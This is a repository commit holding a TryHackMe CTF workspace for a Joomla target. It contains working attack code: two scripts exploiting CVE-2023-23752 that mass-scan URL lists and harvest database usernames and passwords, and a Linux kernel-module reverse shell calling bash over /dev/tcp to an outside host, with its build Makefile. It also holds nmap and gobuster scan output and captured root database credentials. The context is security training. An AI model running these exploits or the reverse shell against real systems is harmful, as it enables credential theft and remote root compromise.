curo/TryHackMe
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

initial commit

Browse Source
This commit is contained in:
Curo
2025-12-04 09:57:17 +01:00
commit 0054cc02b1
4851 changed files with 4416257 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

67
CTF/Voyage/CVE-2023-23752.py Normal file
View File

@@ -0,0 +1,67 @@
import argparse
import re
from typing import List, Tuple, Optional
from concurrent.futures import ThreadPoolExecutor, as_completed
import requests
class URLScanner:
def __init__(self, url_list: List[str], output_file: Optional[str], endpoint: str = "/api/index.php/v1/config/application?public=true", timeout: int = 2, max_threads: int = 10) -> None:
self.url_list: List[str] = url_list
self.output_file: Optional[str] = output_file
self.regex: re.Pattern = re.compile(r'"user":"(.*?)".*?"password":"(.*?)".*?"db":"(.*?)"')
self.endpoint: str = endpoint
self.timeout: int = timeout
self.max_threads: int = max_threads
def scan_url(self, url: str) -> None:
try:
response = requests.get(f"http://{url}{self.endpoint}", timeout=self.timeout)
if response.ok:
match = self.regex.search(response.text)
if match:
user, password, db = match.groups()
if user and password and db:
print(f"[+] => Vulnerable {url}")
print(f"User: {user} Password: {password} Database: {db}")
if self.output_file:
with open(self.output_file, "a+") as f:
f.write(f"{url} user:{user} password:{password} database:{db}\n")
print(f"File Saved => {self.output_file}")
else:
print(f"[-] => User, password, or database is empty for {url}")
else:
print(f"[-] => Not Vulnerable {url}")
except requests.exceptions.RequestException as e:
print(f"[-] => Error occurred for {url}: {e}")
def scan(self) -> None:
with ThreadPoolExecutor(max_workers=self.max_threads) as executor:
futures = []
for url in self.url_list:
futures.append(executor.submit(self.scan_url, url))
for future in as_completed(futures):
future.result()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
url_group = parser.add_mutually_exclusive_group(required=True)
url_group.add_argument("-u", "--url", type=str, help="URL to scan")
url_group.add_argument("-f", "--file", type=str, help="Path to the file containing URLs to scan")
parser.add_argument("-o","--output_file", type=str, help="Path to the output file (optional)")
parser.add_argument("-e","--endpoint", type=str, default="/api/index.php/v1/config/application?public=true", help="Endpoint to scan (default: /api/index.php/v1/config/application?public=true)")
parser.add_argument("-t","--timeout", type=int, default=2, help="Timeout in seconds (default: 2)")
parser.add_argument("-m","--max_threads", type=int, default=10, help="Maximum number of threads (default: 10)")
args = parser.parse_args()
if args.url:
url_list: List[str] = [args.url]
else:
with open(args.file) as f:
url_list: List[str] = [line.strip() for line in f.readlines()]
scanner: URLScanner = URLScanner(url_list, args.output_file, endpoint=args.endpoint, timeout=args.timeout, max_threads=args.max_threads)
scanner.scan()

7
CTF/Voyage/Makefile Normal file
View File

@@ -0,0 +1,7 @@
obj-m +=reverse-shell.o
all:
make -C /lib/modules/6.8.0-1030-aws/build M=$(PWD) modules
clean:
make -C /lib/modules/6.8.0-1030-aws/build M=$(PWD) clean

14
CTF/Voyage/Result/10.10.159.45/cms.json Normal file
View File

@@ -0,0 +1,14 @@
{
"cms_id": "joom",
"cms_name": "joomla",
"cms_url": "https://joomla.org",
"detection_param": "header",
"directory_listing": "http://10.10.159.45/administrator/modules,http://10.10.159.45/administrator/templates,http://10.10.159.45/administrator/components,http://10.10.159.45/images/banners,",
"joomla_backup_files": "http://10.10.159.45/administrator,",
"joomla_debug_mode": "disabled",
"joomla_readme_file": "http://10.10.159.45/README.txt",
"joomla_version": "4.2.7",
"last_scanned": "2025-10-20 15:37:32.943883",
"url": "http://10.10.159.45",
"vulnerabilities_count": "0"
}

1411
CTF/Voyage/deepce.sh Normal file
View File

File diff suppressed because it is too large Load Diff

19
CTF/Voyage/gobuster_scan1.txt Normal file
View File

@@ -0,0 +1,19 @@
/.htaccess  (Status: 403) [Size: 277]
/.htpasswd  (Status: 403) [Size: 277]
/administrator  (Status: 301) [Size: 320] [--> http://10.10.159.45/administrator/]
/api  (Status: 301) [Size: 310] [--> http://10.10.159.45/api/]
/cache  (Status: 301) [Size: 312] [--> http://10.10.159.45/cache/]
/cli  (Status: 301) [Size: 310] [--> http://10.10.159.45/cli/]
/components  (Status: 301) [Size: 317] [--> http://10.10.159.45/components/]
/images  (Status: 301) [Size: 313] [--> http://10.10.159.45/images/]
/includes  (Status: 301) [Size: 315] [--> http://10.10.159.45/includes/]
/language  (Status: 301) [Size: 315] [--> http://10.10.159.45/language/]
/layouts  (Status: 301) [Size: 314] [--> http://10.10.159.45/layouts/]
/libraries  (Status: 403) [Size: 277]
/media  (Status: 301) [Size: 312] [--> http://10.10.159.45/media/]
/modules  (Status: 301) [Size: 314] [--> http://10.10.159.45/modules/]
/plugins  (Status: 301) [Size: 314] [--> http://10.10.159.45/plugins/]
/robots.txt  (Status: 200) [Size: 764]
/server-status  (Status: 403) [Size: 277]
/templates  (Status: 301) [Size: 316] [--> http://10.10.159.45/templates/]
/tmp  (Status: 301) [Size: 310] [--> http://10.10.159.45/tmp/]

1
CTF/Voyage/gobuster_scan2.txt Normal file
View File

@@ -0,0 +1 @@
/console  (Status: 200) [Size: 1563]

4
CTF/Voyage/investor_id.txt Normal file
View File

@@ -0,0 +1,4 @@
inv-007
inv-042
inv-133
inv-666

4
CTF/Voyage/investor_names.txt Normal file
View File

@@ -0,0 +1,4 @@
John Matrix
Elena Shadow
Victor Night
Anonymous

124
CTF/Voyage/joomla.py Normal file
View File

@@ -0,0 +1,124 @@
import aiohttp
import asyncio
import os , time
import re
import colorama
import urllib3
from colorama import Fore, init
from fake_useragent import UserAgent
init(autoreset=True)
delete_warning = urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
if not os.path.exists('Results'):
os.mkdir('Results')
MAX_REQUESTS_PER_SECOND = 2
LAST_REQUEST_TIME = 0
user_agent_rotator = UserAgent()
def Banner():
print(Fore.LIGHTCYAN_EX+r" ___ _ _ ___ ___ ___ ___ ____ ___ ____ ___ ___ ___ ")
print(Fore.LIGHTCYAN_EX+r"| _]| | || __] [_ ]| |[_ ][__ / ___ [_ ][__ /|_ || __|[_ ]")
print(Fore.LIGHTCYAN_EX+r"| [__| | || _] / / | / | / / [_ \ |___| / / [_ \ / / `__ \ / / ")
print(Fore.LIGHTCYAN_EX+r"\___/|__/ |___] [___] \__|[___][___/ [___][___//_/ |___/[___]")
print(Fore.GREEN+"Github"+Fore.LIGHTWHITE_EX+" https://github.com/Pushkarup ")
print(Fore.GREEN+"LinkedIn"+Fore.LIGHTWHITE_EX+" https://www.linkedin.com/in/pushkar-upadhyay ")
print(f"{Fore.YELLOW}[PoC By PUSHKAR UPADHYAY] - {Fore.GREEN}JOOMLA DATABASE FETCH")
async def fetch(session, url):
global LAST_REQUEST_TIME
current_time = time.time()
elapsed_time_since_last_request = current_time - LAST_REQUEST_TIME
if elapsed_time_since_last_request < 1 / MAX_REQUESTS_PER_SECOND:
await asyncio.sleep(1 / MAX_REQUESTS_PER_SECOND - elapsed_time_since_last_request)
LAST_REQUEST_TIME = time.time()
headers = {
"Host": url,
"content-type": "application/vnd.api+json",
"User-Agent": user_agent_rotator.random,
}
async with session.get(url, headers=headers, verify_ssl=True, timeout=10) as response:
return await response.text(), response.status
async def scan_single_url(session, url):
print(f"\n{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.GREEN}[Scanning!]")
config_url = url + '/api/index.php/v1/config/application?public=true'
content, status = await fetch(session, config_url)
if status == 200 and b'dbtype' in content.encode():
decoded_content = content
dbtype = re.findall('"dbtype":"(.*?)"', decoded_content)[0]
dbprefix = re.findall('"dbprefix":"(.*?)"', decoded_content)[0]
host = re.findall('"host":"(.*?)"', decoded_content)[0]
db = re.findall('"db":"(.*?)"', decoded_content)[0]
user = re.findall('"user":"(.*?)"', decoded_content)[0]
password = re.findall('"password":"(.*?)"', decoded_content)[0]
print(f"{Fore.YELLOW}\n[+] Domain : {Fore.GREEN}{url}")
print(f"{Fore.YELLOW}[+] Database Type : {Fore.GREEN}{dbtype}")
print(f"{Fore.YELLOW}[+] Database Prefix : {Fore.GREEN}{dbprefix}")
print(f"{Fore.YELLOW}[+] Database : {Fore.GREEN}{db}")
print(f"{Fore.YELLOW}[+] Hostname : {Fore.GREEN}{host}")
print(f"{Fore.YELLOW}[+] Username : {Fore.GREEN}{user}")
print(f"{Fore.YELLOW}[+] Password : {Fore.GREEN}{password}\n")
with open('Results/Configurations.txt', 'a') as f:
f.write(f"[+] {url}\nDatabase Type : {dbtype}\nDatabase Prefix : {dbprefix}\nHostname : {host}\nDatabase : {db}\nUsername : {user}\nPassword : {password}\n\n")
return decoded_content, True
else:
print(f"{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.RED}[No Sensitive Information!]")
return '', False
async def scan_multiple_urls(filename):
tasks = []
async with aiohttp.ClientSession() as session:
with open(filename, 'r') as file:
urls = [line.strip() for line in file if line.strip()]
for url in urls:
tasks.append(scan_single_url(session, url))
return await asyncio.gather(*tasks)
def result_summarization(results):
successful_scans = sum(1 for _, success in results if success)
failed_scans = len(results) - successful_scans
error_count = sum(1 for _, success in results if not success)
print("\n======== Scan Summary ========")
print(f"Successful Scans: {successful_scans}")
print(f"Failed Scans: {failed_scans}")
print(f"Errors Encountered: {error_count}")
if __name__ == '__main__':
try:
filename = input(f"\n{Fore.YELLOW}Enter the filename containing URLs: {Fore.RESET}")
if not os.path.isfile(filename):
print(f"{Fore.RED}Error: The specified file does not exist.")
exit()
choice = input(f"\n{Fore.RED}[1] - {Fore.YELLOW}Single Scan\n{Fore.RED}[2] - {Fore.YELLOW}Massive Scan\n\n{Fore.YELLOW}[CVE-2023-23752]: {Fore.WHITE}")
if choice == '1':
url = input(f"\n{Fore.YELLOW}Enter a single IP/Domain: {Fore.RESET}")
asyncio.run(scan_single_url(url))
elif choice == '2':
results = asyncio.run(scan_multiple_urls(filename))
result_summarization(results)
else:
print(f"\n{Fore.RED}Invalid option selected")
except KeyboardInterrupt:
print(f"\n{Fore.RED}Scan interrupted by user.")
except Exception as e:
print(f"{Fore.RED}An unexpected error occurred: {str(e)}")

8579
CTF/Voyage/linpeas.sh Normal file
View File

File diff suppressed because one or more lines are too long

47
CTF/Voyage/nmap_scan1.txt Normal file
View File

@@ -0,0 +1,47 @@
# Nmap 7.95 scan initiated Mon Oct 20 15:16:02 2025 as: /usr/lib/nmap/nmap --privileged -p 22,80,2222,5000 -A -T4 -oN nmap_scan1.txt 10.10.159.45
Nmap scan report for 10.10.159.45
Host is up (0.097s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0d:04:12:6a:ba:d3:d4:6b:2d:2b:db:4d:f6:8e:ee:d6 (ECDSA)
|_ 256 96:4b:b4:4d:a8:fc:b2:6b:ee:97:77:bb:85:23:df:9b (ED25519)
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /api/ /bin/
| /cache/ /cli/ /components/ /includes/ /installation/
|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.58 (Ubuntu)
2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ad:4a:7e:34:01:09:f8:68:d8:f7:dd:b8:57:d4:17:cf (RSA)
| 256 8d:cd:5e:60:35:c8:65:66:3a:c5:5c:2f:ac:62:93:80 (ECDSA)
|_ 256 a9:d5:16:b1:5d:4a:4c:94:3f:fd:a9:68:5f:24:ee:79 (ED25519)
5000/tcp closed upnp
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=10/20%OT=22%CT=5000%CU=40939%PV=Y%DS=2%DC=T%G=Y%TM=68F
OS:63634%P=aarch64-unknown-linux-gnu)SEQ(SP=104%GCD=1%ISR=107%TI=Z%CI=Z%II=
OS:I%TS=A)SEQ(SP=104%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=105%GCD=1%ISR
OS:=109%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=106%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)SE
OS:Q(SP=FB%GCD=1%ISR=108%TI=Z%CI=Z%TS=A)OPS(O1=M509ST11NW7%O2=M509ST11NW7%O
OS:3=M509NNT11NW7%O4=M509ST11NW7%O5=M509ST11NW7%O6=M509ST11)WIN(W1=F4B3%W2=
OS:F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M509NNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=3F%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=3F%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 5000/tcp)
HOP RTT ADDRESS
1 147.88 ms 10.14.0.1
2 147.92 ms 10.10.159.45
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 20 15:16:36 2025 -- 1 IP address (1 host up) scanned in 33.34 seconds

10000
CTF/Voyage/numbers.txt Normal file
View File

File diff suppressed because it is too large Load Diff

6
CTF/Voyage/reports.json Normal file
View File

@@ -0,0 +1,6 @@
{
"last_updated": "2025-10-20 15:37:32.943779",
"results": [
{}
]
}

22
CTF/Voyage/reverse_shell.c Normal file
View File

@@ -0,0 +1,22 @@
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.14.99.89/9001 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
// call_usermodehelper function is used to create user mode processes from kernel space
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);

2
CTF/Voyage/root_passwd.txt Normal file
View File

@@ -0,0 +1,2 @@
[+] => Vulnerable 10.10.159.45
User: root Password: RootPassword@1234 Database: joomla_db

1
CTF/Voyage/target.txt Normal file
View File

@@ -0,0 +1 @@
10.10.158.45